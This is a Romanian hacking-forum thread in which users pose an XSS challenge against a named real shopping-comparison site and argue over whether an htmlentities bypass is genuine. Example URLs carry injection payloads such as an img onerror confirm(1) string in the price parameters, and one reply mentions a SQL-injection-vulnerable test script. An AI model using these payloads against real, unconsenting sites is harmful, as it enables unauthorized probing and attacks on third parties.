Jump to content
Goke

HARD XSS CHALLENGE

Recommended Posts

http://www.compari.ro/CategorySearch.php?st=

vectorul sa fie exact dupa ?st=

gen

http://www.compari.ro/CategorySearch.php?st=<script>alert(1)</script>

ci nu

http://www.compari.ro/CategorySearch.php?st=graficard&noredirect=&minprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&maxprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&orderby=9

Facut de cineva...(nu dau nume)

http://i.imgur.com/stLQEdk.png

NU AS FI VRUT SA DAU HINT... CA DUPA S-AR PRINDE TOATA LUMEA .. CRED CA VOI REGRETA DAR IN FINE :))

HINT=" + "

Edited by Goke
  • Downvote 1
Link to comment
Share on other sites

Imi pare rau ca ai sters topicul vechi, in care iti luasei fail si ai spus ca parametrul este st dar tu facusei xssul la compara pret.

Cum mi-am dat seama?

1.Daca bagi orice vector in search, nu iti apare nimic, niciun rezultat, pe cand tie ti-au aparut rezultate care nu au treaba.

2.Cenzurasei campul de la compara pret.

3.Aveai prtscr la fel ca al meu. (adica era in acelasi loc)

Link to comment
Share on other sites

//Stiind ca a face bypass la htmlentities este un lucru imposibil ,uitati ca aici nu este imposibil ^_^//

Bypass la htmlentities se poate face in unele cazuri ideale.Iin cazul tau vectorul executat nu este cel afisat prin htmlentities, n-ai facut nici un bypass stai linistit.

Link to comment
Share on other sites

[1:06:14 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ma ajuti cu un host ?

[1:06:18 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: free

[1:06:22 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: ca am de la hostinger

[1:06:24 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si

[1:06:28 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: numi place ,,

[1:06:35 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: mai demult mergea

[1:06:50 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: miam facut un script de conecatre la baza de date vulnerabil la sqli

[1:06:59 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: dar acum cand incerc order by

[1:07:01 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: nu mai merge

[1:07:08 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: si cred ca e de la host

Mda,cam a?a ceva pe skype.

  • Downvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...